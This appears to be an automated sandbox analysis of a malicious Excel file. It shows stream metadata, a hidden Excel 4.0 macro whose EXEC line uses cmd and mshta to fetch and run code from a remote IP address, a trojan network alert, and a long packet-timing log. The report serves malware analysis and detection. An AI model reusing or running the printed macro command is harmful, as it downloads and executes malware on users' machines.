                                                                                                                    File Type:data
                                                                                                                    Stream Size:4096
                                                                                                                    Entropy:0.319071371437
                                                                                                                    Base64 Encoded:False
                                                                                                                    Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , . . 0 . . . . . . . . . . . . . . . P . . . . . . . X . . . . . . . d . . . . . . . l . . . . . . . t . . . . . . . | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . S h e e t 1 . . . . . M a c r o 3 . . . . . . . . . . . . . . . . . W o r k s h e e t s . . . . . . . . . . . .
                                                                                                                    General
                                                                                                                    Stream Path:\x5SummaryInformation
                                                                                                                    File Type:data
                                                                                                                    Stream Size:4096
                                                                                                                    Entropy:0.262870751343
                                                                                                                    Base64 Encoded:False
                                                                                                                    Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . . . + ' . . 0 . . . . . . . . . . . . . . . @ . . . . . . . H . . . . . . . T . . . . . . . ` . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x X x . . . . . . . . . x X x . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . . . R . . . . @ . . . . e . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                    General
                                                                                                                    Stream Path:Workbook
                                                                                                                    File Type:Applesoft BASIC program data, first line number 16
                                                                                                                    Stream Size:81211
                                                                                                                    Entropy:7.38151716612
                                                                                                                    Base64 Encoded:True
                                                                                                                    Data ASCII:. . . . . . . . Z O . . . . . . . . . . . . . . . . . . . . . . . . . . \\ . p . . . . x X x B . . . . . a . . . . . . . . . = . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . = . . . . . . . X a & 8 . . . . . . . X . @ . . . . . . . . . . . " . . . . . . . . .
                                                                                                                    Name:Macro3
                                                                                                                    Type:3
                                                                                                                    Final:False
                                                                                                                    Visible:False
                                                                                                                    Protected:False
                                                                                                                    Macro3, 3, False, 0, False, post
                                                                                                                    2,2,=EXEC("cmd /c set ooo=mshta http://91.240.118.172/ee/ss/se.html & echo %ooo% | cmd")
                                                                                                                    5,2,=HALT()
                                                                                                                    Name:Macro3
                                                                                                                    Type:3
                                                                                                                    Final:False
                                                                                                                    Visible:False
                                                                                                                    Protected:False
                                                                                                                    Macro3, 3, False, 0, False, pre
                                                                                                                    2,2,=EXEC("cmd /c set ooo=mshta http://91.240.118.172/ee/ss/se.html & echo %ooo% | cmd")
                                                                                                                    5,2,=HALT()
                                                                                                                    Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
                                                                                                                    01/28/22-21:15:07.666041 | TCP | 2034631 | ET TROJAN Maldoc Activity (set) | 49166 | 80 | 192.168.2.22 | 91.240.118.172
                                                                                                                    Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                                                                    Jan 28, 2022 21:15:08.230477095 CET8049167136.0.111.15192.168.2.22
                                                                                                                    Jan 28, 2022 21:15:08.230495930 CET8049167136.0.111.15192.168.2.22
                                                                                                                    Jan 28, 2022 21:15:08.230513096 CET4916780192.168.2.22136.0.111.15
                                                                                                                    Jan 28, 2022 21:15:08.230514050 CET8049167136.0.111.15192.168.2.22
                                                                                                                    Jan 28, 2022 21:15:08.230526924 CET8049167136.0.111.15192.168.2.22
                                                                                                                    Jan 28, 2022 21:15:08.230545998 CET8049167136.0.111.15192.168.2.22
                                                                                                                    Jan 28, 2022 21:15:08.230557919 CET4916780192.168.2.22136.0.111.15
                                                                                                                    Jan 28, 2022 21:15:08.230568886 CET8049167136.0.111.15192.168.2.22
                                                                                                                    Jan 28, 2022 21:15:08.230590105 CET8049167136.0.111.15192.168.2.22
                                                                                                                    Jan 28, 2022 21:15:08.230607033 CET8049167136.0.111.15192.168.2.22
                                                                                                                    Jan 28, 2022 21:15:08.230612040 CET4916780192.168.2.22136.0.111.15
                                                                                                                    Jan 28, 2022 21:15:08.230618000 CET4916780192.168.2.22136.0.111.15
                                                                                                                    Jan 28, 2022 21:15:08.230624914 CET8049167136.0.111.15192.168.2.22
                                                                                                                    Jan 28, 2022 21:15:08.230642080 CET8049167136.0.111.15192.168.2.22
                                                                                                                    Jan 28, 2022 21:15:08.230657101 CET4916780192.168.2.22136.0.111.15
                                                                                                                    Jan 28, 2022 21:15:08.230659008 CET8049167136.0.111.15192.168.2.22
                                                                                                                    Jan 28, 2022 21:15:08.230674982 CET8049167136.0.111.15192.168.2.22
                                                                                                                    Jan 28, 2022 21:15:08.230691910 CET4916780192.168.2.22136.0.111.15
                                                                                                                    Jan 28, 2022 21:15:08.230693102 CET8049167136.0.111.15192.168.2.22
                                                                                                                    Jan 28, 2022 21:15:08.230710030 CET8049167136.0.111.15192.168.2.22
                                                                                                                    Jan 28, 2022 21:15:08.230726004 CET4916780192.168.2.22136.0.111.15
                                                                                                                    Jan 28, 2022 21:15:08.230729103 CET8049167136.0.111.15192.168.2.22
                                                                                                                    Jan 28, 2022 21:15:08.230746984 CET8049167136.0.111.15192.168.2.22
                                                                                                                    Jan 28, 2022 21:15:08.230760098 CET4916780192.168.2.22136.0.111.15
                                                                                                                    Jan 28, 2022 21:15:08.230765104 CET8049167136.0.111.15192.168.2.22
                                                                                                                    Jan 28, 2022 21:15:08.230782032 CET8049167136.0.111.15192.168.2.22
                                                                                                                    Jan 28, 2022 21:15:08.230793953 CET4916780192.168.2.22136.0.111.15
                                                                                                                    Jan 28, 2022 21:15:08.369255066 CET8049167136.0.111.15192.168.2.22
                                                                                                                    Jan 28, 2022 21:15:08.369285107 CET8049167136.0.111.15192.168.2.22
                                                                                                                    Jan 28, 2022 21:15:08.369302034 CET8049167136.0.111.15192.168.2.22
                                                                                                                    Jan 28, 2022 21:15:08.369321108 CET8049167136.0.111.15192.168.2.22
                                                                                                                    Jan 28, 2022 21:15:08.369339943 CET8049167136.0.111.15192.168.2.22
                                                                                                                    Jan 28, 2022 21:15:08.369357109 CET8049167136.0.111.15192.168.2.22
                                                                                                                    Jan 28, 2022 21:15:08.369378090 CET8049167136.0.111.15192.168.2.22
                                                                                                                    Jan 28, 2022 21:15:08.369395018 CET8049167136.0.111.15192.168.2.22
                                                                                                                    Jan 28, 2022 21:15:08.369395018 CET4916780192.168.2.22136.0.111.15
                                                                                                                    Jan 28, 2022 21:15:08.369411945 CET8049167136.0.111.15192.168.2.22
                                                                                                                    Jan 28, 2022 21:15:08.369426966 CET4916780192.168.2.22136.0.111.15
                                                                                                                    Jan 28, 2022 21:15:08.369430065 CET8049167136.0.111.15192.168.2.22
                                                                                                                    Jan 28, 2022 21:15:08.369436979 CET4916780192.168.2.22136.0.111.15
                                                                                                                    Jan 28, 2022 21:15:08.369448900 CET8049167136.0.111.15192.168.2.22
                                                                                                                    Jan 28, 2022 21:15:08.369467020 CET8049167136.0.111.15192.168.2.22
                                                                                                                    Jan 28, 2022 21:15:08.369477034 CET4916780192.168.2.22136.0.111.15
                                                                                                                    Jan 28, 2022 21:15:08.369484901 CET8049167136.0.111.15192.168.2.22
                                                                                                                    Jan 28, 2022 21:15:08.369503975 CET8049167136.0.111.15192.168.2.22
                                                                                                                    Jan 28, 2022 21:15:08.369522095 CET8049167136.0.111.15192.168.2.22
                                                                                                                    Jan 28, 2022 21:15:08.369538069 CET8049167136.0.111.15192.168.2.22
                                                                                                                    Jan 28, 2022 21:15:08.369546890 CET4916780192.168.2.22136.0.111.15
                                                                                                                    Jan 28, 2022 21:15:08.369554996 CET8049167136.0.111.15192.168.2.22
                                                                                                                    Jan 28, 2022 21:15:08.369565964 CET4916780192.168.2.22136.0.111.15
                                                                                                                    Jan 28, 2022 21:15:08.369571924 CET8049167136.0.111.15192.168.2.22
                                                                                                                    Jan 28, 2022 21:15:08.369590044 CET8049167136.0.111.15192.168.2.22
                                                                                                                    Jan 28, 2022 21:15:08.369594097 CET4916780192.168.2.22136.0.111.15
                                                                                                                    Jan 28, 2022 21:15:08.369606972 CET8049167136.0.111.15192.168.2.22
                                                                                                                    Jan 28, 2022 21:15:08.369623899 CET8049167136.0.111.15192.168.2.22
                                                                                                                    Jan 28, 2022 21:15:08.369642019 CET8049167136.0.111.15192.168.2.22
                                                                                                                    Jan 28, 2022 21:15:08.369649887 CET4916780192.168.2.22136.0.111.15
                                                                                                                    Jan 28, 2022 21:15:08.369658947 CET8049167136.0.111.15192.168.2.22
                                                                                                                    Jan 28, 2022 21:15:08.369678020 CET8049167136.0.111.15192.168.2.22
                                                                                                                    Jan 28, 2022 21:15:08.369694948 CET8049167136.0.111.15192.168.2.22
                                                                                                                    Jan 28, 2022 21:15:08.369713068 CET8049167136.0.111.15192.168.2.22
                                                                                                                    Jan 28, 2022 21:15:08.369719028 CET4916780192.168.2.22136.0.111.15
                                                                                                                    Jan 28, 2022 21:15:08.369729996 CET8049167136.0.111.15192.168.2.22
                                                                                                                    Jan 28, 2022 21:15:08.369749069 CET8049167136.0.111.15192.168.2.22
                                                                                                                    Jan 28, 2022 21:15:08.369775057 CET8049167136.0.111.15192.168.2.22
                                                                                                                    Jan 28, 2022 21:15:08.369781017 CET4916780192.168.2.22136.0.111.15
                                                                                                                    Jan 28, 2022 21:15:08.369791031 CET8049167136.0.111.15192.168.2.22
                                                                                                                    Jan 28, 2022 21:15:08.369807005 CET8049167136.0.111.15192.168.2.22
                                                                                                                    Jan 28, 2022 21:15:08.369815111 CET4916780192.168.2.22136.0.111.15
                                                                                                                    Jan 28, 2022 21:15:08.369823933 CET8049167136.0.111.15192.168.2.22
                                                                                                                    Jan 28, 2022 21:15:08.369832039 CET4916780192.168.2.22136.0.111.15
                                                                                                                    Jan 28, 2022 21:15:08.369843006 CET8049167136.0.111.15192.168.2.22
                                                                                                                    Jan 28, 2022 21:15:08.369875908 CET8049167136.0.111.15192.168.2.22
                                                                                                                    Jan 28, 2022 21:15:08.369894028 CET8049167136.0.111.15192.168.2.22
                                                                                                                    Jan 28, 2022 21:15:08.369898081 CET4916780192.168.2.22136.0.111.15
                                                                                                                    Jan 28, 2022 21:15:08.369910002 CET8049167136.0.111.15192.168.2.22
                                                                                                                    Jan 28, 2022 21:15:08.369930029 CET8049167136.0.111.15192.168.2.22
                                                                                                                    Jan 28, 2022 21:15:08.369946957 CET8049167136.0.111.15192.168.2.22
                                                                                                                    Jan 28, 2022 21:15:08.369951963 CET4916780192.168.2.22136.0.111.15
                                                                                                                    Jan 28, 2022 21:15:08.373645067 CET4916780192.168.2.22136.0.111.15
                                                                                                                    Jan 28, 2022 21:15:08.508466005 CET8049167136.0.111.15192.168.2.22
                                                                                                                    Jan 28, 2022 21:15:08.508524895 CET8049167136.0.111.15192.168.2.22
                                                                                                                    Jan 28, 2022 21:15:08.508565903 CET8049167136.0.111.15192.168.2.22
                                                                                                                    Jan 28, 2022 21:15:08.508605003 CET8049167136.0.111.15192.168.2.22
                                                                                                                    Jan 28, 2022 21:15:08.508644104 CET8049167136.0.111.15192.168.2.22
                                                                                                                    Jan 28, 2022 21:15:08.508646965 CET4916780192.168.2.22136.0.111.15
                                                                                                                    Jan 28, 2022 21:15:08.508671999 CET4916780192.168.2.22136.0.111.15
                                                                                                                    Jan 28, 2022 21:15:08.508685112 CET8049167136.0.111.15192.168.2.22
                                                                                                                    Jan 28, 2022 21:15:08.508723974 CET8049167136.0.111.15192.168.2.22
                                                                                                                    Jan 28, 2022 21:15:08.508730888 CET4916780192.168.2.22136.0.111.15
                                                                                                                    Jan 28, 2022 21:15:08.508764982 CET8049167136.0.111.15192.168.2.22
                                                                                                                    Jan 28, 2022 21:15:08.508807898 CET8049167136.0.111.15192.168.2.22
                                                                                                                    Jan 28, 2022 21:15:08.508846045 CET8049167136.0.111.15192.168.2.22
                                                                                                                    Jan 28, 2022 21:15:08.508851051 CET4916780192.168.2.22136.0.111.15
                                                                                                                    Jan 28, 2022 21:15:08.508887053 CET8049167136.0.111.15192.168.2.22
                                                                                                                    Jan 28, 2022 21:15:08.508927107 CET8049167136.0.111.15192.168.2.22
                                                                                                                    Jan 28, 2022 21:15:08.508968115 CET8049167136.0.111.15192.168.2.22
                                                                                                                    Jan 28, 2022 21:15:08.508968115 CET4916780192.168.2.22136.0.111.15
                                                                                                                    Jan 28, 2022 21:15:08.509008884 CET8049167136.0.111.15192.168.2.22
                                                                                                                    Jan 28, 2022 21:15:08.509046078 CET8049167136.0.111.15192.168.2.22
                                                                                                                    Jan 28, 2022 21:15:08.509084940 CET8049167136.0.111.15192.168.2.22
                                                                                                                    Jan 28, 2022 21:15:08.509088993 CET4916780192.168.2.22136.0.111.15
                                                                                                                    Jan 28, 2022 21:15:08.509124994 CET8049167136.0.111.15192.168.2.22
                                                                                                                    Jan 28, 2022 21:15:08.509164095 CET8049167136.0.111.15192.168.2.22
                                                                                                                    Jan 28, 2022 21:15:08.509203911 CET8049167136.0.111.15192.168.2.22
                                                                                                                    Jan 28, 2022 21:15:08.509207010 CET4916780192.168.2.22136.0.111.15
                                                                                                                    Jan 28, 2022 21:15:08.509243011 CET8049167136.0.111.15192.168.2.22
                                                                                                                    Jan 28, 2022 21:15:08.509283066 CET8049167136.0.111.15192.168.2.22
                                                                                                                    Jan 28, 2022 21:15:08.509314060 CET8049167136.0.111.15192.168.2.22
                                                                                                                    Jan 28, 2022 21:15:08.509332895 CET4916780192.168.2.22136.0.111.15
                                                                                                                    Jan 28, 2022 21:15:08.509355068 CET8049167136.0.111.15192.168.2.22
                                                                                                                    Jan 28, 2022 21:15:08.509394884 CET8049167136.0.111.15192.168.2.22
                                                                                                                    Jan 28, 2022 21:15:08.509426117 CET8049167136.0.111.15192.168.2.22
                                                                                                                    Jan 28, 2022 21:15:08.509455919 CET4916780192.168.2.22136.0.111.15
                                                                                                                    Jan 28, 2022 21:15:08.509465933 CET8049167136.0.111.15192.168.2.22
                                                                                                                    Jan 28, 2022 21:15:08.509507895 CET8049167136.0.111.15192.168.2.22
                                                                                                                    Jan 28, 2022 21:15:08.509546995 CET8049167136.0.111.15192.168.2.22
                                                                                                                    Jan 28, 2022 21:15:08.509552002 CET4916780192.168.2.22136.0.111.15
                                                                                                                    Jan 28, 2022 21:15:08.509587049 CET8049167136.0.111.15192.168.2.22
                                                                                                                    Jan 28, 2022 21:15:08.509627104 CET8049167136.0.111.15192.168.2.22
                                                                                                                    Jan 28, 2022 21:15:08.509634972 CET4916780192.168.2.22136.0.111.15
                                                                                                                    Jan 28, 2022 21:15:08.509665966 CET8049167136.0.111.15192.168.2.22
                                                                                                                    Jan 28, 2022 21:15:08.509706974 CET8049167136.0.111.15192.168.2.22
                                                                                                                    Jan 28, 2022 21:15:08.509747028 CET8049167136.0.111.15192.168.2.22
                                                                                                                    Jan 28, 2022 21:15:08.509766102 CET4916780192.168.2.22136.0.111.15
                                                                                                                    Jan 28, 2022 21:15:08.509789944 CET8049167136.0.111.15192.168.2.22
                                                                                                                    Jan 28, 2022 21:15:08.509831905 CET8049167136.0.111.15192.168.2.22
                                                                                                                    Jan 28, 2022 21:15:08.509876013 CET4916780192.168.2.22136.0.111.15
                                                                                                                    Jan 28, 2022 21:15:08.509902000 CET8049167136.0.111.15192.168.2.22
                                                                                                                    Jan 28, 2022 21:15:08.509942055 CET8049167136.0.111.15192.168.2.22
                                                                                                                    Jan 28, 2022 21:15:08.509982109 CET8049167136.0.111.15192.168.2.22
                                                                                                                    Jan 28, 2022 21:15:08.509989023 CET4916780192.168.2.22136.0.111.15
                                                                                                                    Jan 28, 2022 21:15:08.510021925 CET8049167136.0.111.15192.168.2.22
                                                                                                                    Jan 28, 2022 21:15:08.510061026 CET8049167136.0.111.15192.168.2.22
                                                                                                                    Jan 28, 2022 21:15:08.510099888 CET8049167136.0.111.15192.168.2.22
                                                                                                                    Jan 28, 2022 21:15:08.510121107 CET4916780192.168.2.22136.0.111.15
                                                                                                                    Jan 28, 2022 21:15:08.510138035 CET8049167136.0.111.15192.168.2.22
                                                                                                                    Jan 28, 2022 21:15:08.510179043 CET8049167136.0.111.15192.168.2.22
                                                                                                                    Jan 28, 2022 21:15:08.510220051 CET8049167136.0.111.15192.168.2.22
                                                                                                                    Jan 28, 2022 21:15:08.510231972 CET4916780192.168.2.22136.0.111.15
                                                                                                                    Jan 28, 2022 21:15:08.510257959 CET8049167136.0.111.15192.168.2.22
                                                                                                                    Jan 28, 2022 21:15:08.510297060 CET8049167136.0.111.15192.168.2.22
                                                                                                                    Jan 28, 2022 21:15:08.510323048 CET4916780192.168.2.22136.0.111.15
                                                                                                                    Jan 28, 2022 21:15:08.510337114 CET8049167136.0.111.15192.168.2.22
                                                                                                                    Jan 28, 2022 21:15:08.510387897 CET4916780192.168.2.22136.0.111.15
                                                                                                                    Jan 28, 2022 21:15:08.510396957 CET4916780192.168.2.22136.0.111.15
                                                                                                                    Jan 28, 2022 21:15:08.512239933 CET8049167136.0.111.15192.168.2.22
                                                                                                                    Jan 28, 2022 21:15:08.512283087 CET8049167136.0.111.15192.168.2.22
                                                                                                                    Jan 28, 2022 21:15:08.512353897 CET4916780192.168.2.22136.0.111.15
                                                                                                                    Jan 28, 2022 21:15:08.648926973 CET8049167136.0.111.15192.168.2.22
                                                                                                                    Jan 28, 2022 21:15:08.648982048 CET8049167136.0.111.15192.168.2.22
                                                                                                                    Jan 28, 2022 21:15:08.649007082 CET8049167136.0.111.15192.168.2.22
                                                                                                                    Jan 28, 2022 21:15:08.649029016 CET8049167136.0.111.15192.168.2.22
                                                                                                                    Jan 28, 2022 21:15:08.930444956 CET8049167136.0.111.15192.168.2.22
                                                                                                                    Jan 28, 2022 21:15:08.930445910 CET4916780192.168.2.22136.0.111.15
                                                                                                                    Jan 28, 2022 21:15:08.930485010 CET8049167136.0.111.15192.168.2.22
                                                                                                                    Jan 28, 2022 21:15:08.930526018 CET8049167136.0.111.15192.168.2.22
                                                                                                                    Jan 28, 2022 21:15:08.930529118 CET4916780192.168.2.22136.0.111.15
                                                                                                                    Jan 28, 2022 21:15:08.930567026 CET8049167136.0.111.15192.168.2.22
                                                                                                                    Jan 28, 2022 21:15:08.930578947 CET4916780192.168.2.22136.0.111.15
                                                                                                                    Jan 28, 2022 21:15:08.930605888 CET8049167136.0.111.15192.168.2.22
                                                                                                                    Jan 28, 2022 21:15:08.930609941 CET4916780192.168.2.22136.0.111.15
                                                                                                                    Jan 28, 2022 21:15:08.930645943 CET8049167136.0.111.15192.168.2.22
                                                                                                                    Jan 28, 2022 21:15:08.930685997 CET8049167136.0.111.15192.168.2.22
                                                                                                                    Jan 28, 2022 21:15:08.930689096 CET4916780192.168.2.22136.0.111.15
                                                                                                                    Jan 28, 2022 21:15:08.930725098 CET8049167136.0.111.15192.168.2.22
                                                                                                                    Jan 28, 2022 21:15:08.930764914 CET8049167136.0.111.15192.168.2.22
                                                                                                                    Jan 28, 2022 21:15:08.930766106 CET4916780192.168.2.22136.0.111.15
                                                                                                                    Jan 28, 2022 21:15:08.930804968 CET8049167136.0.111.15192.168.2.22
                                                                                                                    Jan 28, 2022 21:15:08.930845976 CET8049167136.0.111.15192.168.2.22
                                                                                                                    Jan 28, 2022 21:15:08.930862904 CET4916780192.168.2.22136.0.111.15
                                                                                                                    Jan 28, 2022 21:15:08.930891991 CET8049167136.0.111.15192.168.2.22
                                                                                                                    Jan 28, 2022 21:15:08.930931091 CET8049167136.0.111.15192.168.2.22
                                                                                                                    Jan 28, 2022 21:15:08.930933952 CET4916780192.168.2.22136.0.111.15
                                                                                                                    Jan 28, 2022 21:15:08.930972099 CET8049167136.0.111.15192.168.2.22
                                                                                                                    Jan 28, 2022 21:15:08.931010962 CET8049167136.0.111.15192.168.2.22
                                                                                                                    Jan 28, 2022 21:15:08.931011915 CET4916780192.168.2.22136.0.111.15
                                                                                                                    Jan 28, 2022 21:15:08.931050062 CET8049167136.0.111.15192.168.2.22
                                                                                                                    Jan 28, 2022 21:15:08.931088924 CET8049167136.0.111.15192.168.2.22
                                                                                                                    Jan 28, 2022 21:15:08.931093931 CET4916780192.168.2.22136.0.111.15
                                                                                                                    Jan 28, 2022 21:15:08.931128025 CET8049167136.0.111.15192.168.2.22
                                                                                                                    Jan 28, 2022 21:15:08.931168079 CET8049167136.0.111.15192.168.2.22
                                                                                                                    Jan 28, 2022 21:15:08.931169033 CET4916780192.168.2.22136.0.111.15
                                                                                                                    Jan 28, 2022 21:15:08.931209087 CET8049167136.0.111.15192.168.2.22
                                                                                                                    Jan 28, 2022 21:15:08.931247950 CET8049167136.0.111.15192.168.2.22
                                                                                                                    Jan 28, 2022 21:15:08.931251049 CET4916780192.168.2.22136.0.111.15
                                                                                                                    Jan 28, 2022 21:15:08.931288958 CET8049167136.0.111.15192.168.2.22
                                                                                                                    Jan 28, 2022 21:15:08.931329966 CET8049167136.0.111.15192.168.2.22
                                                                                                                    Jan 28, 2022 21:15:08.931340933 CET4916780192.168.2.22136.0.111.15
                                                                                                                    Jan 28, 2022 21:15:08.931366920 CET8049167136.0.111.15192.168.2.22
                                                                                                                    Jan 28, 2022 21:15:08.931407928 CET8049167136.0.111.15192.168.2.22
                                                                                                                    Jan 28, 2022 21:15:08.931408882 CET4916780192.168.2.22136.0.111.15
                                                                                                                    Jan 28, 2022 21:15:08.931447983 CET8049167136.0.111.15192.168.2.22
                                                                                                                    Jan 28, 2022 21:15:08.931488037 CET8049167136.0.111.15192.168.2.22
                                                                                                                    Jan 28, 2022 21:15:08.931489944 CET4916780192.168.2.22136.0.111.15
                                                                                                                    Jan 28, 2022 21:15:08.931529045 CET8049167136.0.111.15192.168.2.22
                                                                                                                    Jan 28, 2022 21:15:08.931566954 CET8049167136.0.111.15192.168.2.22
                                                                                                                    Jan 28, 2022 21:15:08.931607962 CET8049167136.0.111.15192.168.2.22
                                                                                                                    Jan 28, 2022 21:15:08.931615114 CET4916780192.168.2.22136.0.111.15
                                                                                                                    Jan 28, 2022 21:15:08.931647062 CET8049167136.0.111.15192.168.2.22
                                                                                                                    Jan 28, 2022 21:15:08.931687117 CET8049167136.0.111.15192.168.2.22
                                                                                                                    Jan 28, 2022 21:15:08.931725979 CET8049167136.0.111.15192.168.2.22
                                                                                                                    Jan 28, 2022 21:15:08.931730032 CET4916780192.168.2.22136.0.111.15
                                                                                                                    Jan 28, 2022 21:15:08.931765079 CET8049167136.0.111.15192.168.2.22
                                                                                                                    Jan 28, 2022 21:15:08.931806087 CET8049167136.0.111.15192.168.2.22
                                                                                                                    Jan 28, 2022 21:15:08.931808949 CET4916780192.168.2.22136.0.111.15
                                                                                                                    Jan 28, 2022 21:15:08.931848049 CET8049167136.0.111.15192.168.2.22
                                                                                                                    Jan 28, 2022 21:15:08.931885958 CET8049167136.0.111.15192.168.2.22
                                                                                                                    Jan 28, 2022 21:15:08.931915998 CET4916780192.168.2.22136.0.111.15
                                                                                                                    Jan 28, 2022 21:15:08.931926966 CET8049167136.0.111.15192.168.2.22
                                                                                                                    Jan 28, 2022 21:15:08.931967020 CET8049167136.0.111.15192.168.2.22
                                                                                                                    Jan 28, 2022 21:15:08.931971073 CET4916780192.168.2.22136.0.111.15
                                                                                                                    Jan 28, 2022 21:15:08.932004929 CET8049167136.0.111.15192.168.2.22
                                                                                                                    Jan 28, 2022 21:15:08.932044983 CET8049167136.0.111.15192.168.2.22
                                                                                                                    Jan 28, 2022 21:15:08.932046890 CET4916780192.168.2.22136.0.111.15
                                                                                                                    Jan 28, 2022 21:15:08.932085037 CET8049167136.0.111.15192.168.2.22
                                                                                                                    Jan 28, 2022 21:15:08.932126045 CET4916780192.168.2.22136.0.111.15
                                                                                                                    Jan 28, 2022 21:15:08.932126999 CET8049167136.0.111.15192.168.2.22
                                                                                                                    Jan 28, 2022 21:15:08.932168007 CET8049167136.0.111.15192.168.2.22
                                                                                                                    Jan 28, 2022 21:15:08.932205915 CET8049167136.0.111.15192.168.2.22
                                                                                                                    Jan 28, 2022 21:15:08.932212114 CET4916780192.168.2.22136.0.111.15
                                                                                                                    Jan 28, 2022 21:15:08.932245970 CET8049167136.0.111.15192.168.2.22
                                                                                                                    Jan 28, 2022 21:15:08.932286978 CET8049167136.0.111.15192.168.2.22
                                                                                                                    Jan 28, 2022 21:15:08.932287931 CET4916780192.168.2.22136.0.111.15
                                                                                                                    Jan 28, 2022 21:15:08.932323933 CET8049167136.0.111.15192.168.2.22
                                                                                                                    Jan 28, 2022 21:15:08.932363987 CET4916780192.168.2.22136.0.111.15
                                                                                                                    Jan 28, 2022 21:15:08.932363987 CET8049167136.0.111.15192.168.2.22
                                                                                                                    Jan 28, 2022 21:15:08.932404041 CET8049167136.0.111.15192.168.2.22
                                                                                                                    Jan 28, 2022 21:15:08.932444096 CET8049167136.0.111.15192.168.2.22
                                                                                                                    Jan 28, 2022 21:15:08.932446003 CET4916780192.168.2.22136.0.111.15
                                                                                                                    Jan 28, 2022 21:15:08.932486057 CET8049167136.0.111.15192.168.2.22
                                                                                                                    Jan 28, 2022 21:15:08.932523966 CET8049167136.0.111.15192.168.2.22
                                                                                                                    Jan 28, 2022 21:15:08.932528019 CET4916780192.168.2.22136.0.111.15
                                                                                                                    Jan 28, 2022 21:15:08.932563066 CET8049167136.0.111.15192.168.2.22
                                                                                                                    Jan 28, 2022 21:15:08.932602882 CET8049167136.0.111.15192.168.2.22
                                                                                                                    Jan 28, 2022 21:15:08.932605982 CET4916780192.168.2.22136.0.111.15
                                                                                                                    Jan 28, 2022 21:15:08.932641029 CET8049167136.0.111.15192.168.2.22
                                                                                                                    Jan 28, 2022 21:15:08.932681084 CET8049167136.0.111.15192.168.2.22
                                                                                                                    Jan 28, 2022 21:15:08.932683945 CET4916780192.168.2.22136.0.111.15
                                                                                                                    Jan 28, 2022 21:15:08.932719946 CET8049167136.0.111.15192.168.2.22
                                                                                                                    Jan 28, 2022 21:15:08.932760954 CET8049167136.0.111.15192.168.2.22
                                                                                                                    Jan 28, 2022 21:15:08.932775021 CET4916780192.168.2.22136.0.111.15
                                                                                                                    Jan 28, 2022 21:15:08.932815075 CET8049167136.0.111.15192.168.2.22
                                                                                                                    Jan 28, 2022 21:15:08.932854891 CET8049167136.0.111.15192.168.2.22
                                                                                                                    Jan 28, 2022 21:15:08.932857990 CET4916780192.168.2.22136.0.111.15
                                                                                                                    Jan 28, 2022 21:15:08.932898998 CET8049167136.0.111.15192.168.2.22
                                                                                                                    Jan 28, 2022 21:15:08.932940960 CET8049167136.0.111.15192.168.2.22
                                                                                                                    Jan 28, 2022 21:15:08.932944059 CET4916780192.168.2.22136.0.111.15
                                                                                                                    Jan 28, 2022 21:15:08.932980061 CET8049167136.0.111.15192.168.2.22
                                                                                                                    Jan 28, 2022 21:15:08.933022022 CET8049167136.0.111.15192.168.2.22
                                                                                                                    Jan 28, 2022 21:15:08.933047056 CET4916780192.168.2.22136.0.111.15
                                                                                                                    Jan 28, 2022 21:15:08.933062077 CET8049167136.0.111.15192.168.2.22
                                                                                                                    Jan 28, 2022 21:15:08.933088064 CET4916780192.168.2.22136.0.111.15
                                                                                                                    Jan 28, 2022 21:15:08.933103085 CET8049167136.0.111.15192.168.2.22
                                                                                                                    Jan 28, 2022 21:15:08.933145046 CET8049167136.0.111.15192.168.2.22
                                                                                                                    Jan 28, 2022 21:15:08.933182001 CET8049167136.0.111.15192.168.2.22
                                                                                                                    Jan 28, 2022 21:15:08.933188915 CET4916780192.168.2.22136.0.111.15
                                                                                                                    Jan 28, 2022 21:15:08.933223009 CET8049167136.0.111.15192.168.2.22
                                                                                                                    Jan 28, 2022 21:15:08.933264971 CET8049167136.0.111.15192.168.2.22
                                                                                                                    Jan 28, 2022 21:15:08.933303118 CET8049167136.0.111.15192.168.2.22
                                                                                                                    Jan 28, 2022 21:15:08.933316946 CET4916780192.168.2.22136.0.111.15
                                                                                                                    Jan 28, 2022 21:15:08.933335066 CET4916780192.168.2.22136.0.111.15
                                                                                                                    Jan 28, 2022 21:15:08.933341980 CET8049167136.0.111.15192.168.2.22
                                                                                                                    Jan 28, 2022 21:15:08.933381081 CET8049167136.0.111.15192.168.2.22
                                                                                                                    Jan 28, 2022 21:15:08.933422089 CET4916780192.168.2.22136.0.111.15
                                                                                                                    Jan 28, 2022 21:15:08.933433056 CET4916780192.168.2.22136.0.111.15
                                                                                                                    Jan 28, 2022 21:15:09.072041988 CET8049167136.0.111.15192.168.2.22
                                                                                                                    Jan 28, 2022 21:15:09.072072029 CET8049167136.0.111.15192.168.2.22
                                                                                                                    Jan 28, 2022 21:15:09.072089911 CET8049167136.0.111.15192.168.2.22
                                                                                                                    Jan 28, 2022 21:15:09.072108030 CET8049167136.0.111.15192.168.2.22
                                                                                                                    Jan 28, 2022 21:15:09.072124958 CET8049167136.0.111.15192.168.2.22
                                                                                                                    Jan 28, 2022 21:15:09.072141886 CET8049167136.0.111.15192.168.2.22
                                                                                                                    Jan 28, 2022 21:15:09.072160006 CET8049167136.0.111.15192.168.2.22
                                                                                                                    Jan 28, 2022 21:15:09.072179079 CET8049167136.0.111.15192.168.2.22
                                                                                                                    Jan 28, 2022 21:15:09.072179079 CET4916780192.168.2.22136.0.111.15
                                                                                                                    Jan 28, 2022 21:15:09.072196007 CET8049167136.0.111.15192.168.2.22
                                                                                                                    Jan 28, 2022 21:15:09.072196007 CET4916780192.168.2.22136.0.111.15
                                                                                                                    Jan 28, 2022 21:15:09.072202921 CET4916780192.168.2.22136.0.111.15
                                                                                                                    Jan 28, 2022 21:15:09.072206020 CET4916780192.168.2.22136.0.111.15
                                                                                                                    Jan 28, 2022 21:15:09.072208881 CET4916780192.168.2.22136.0.111.15
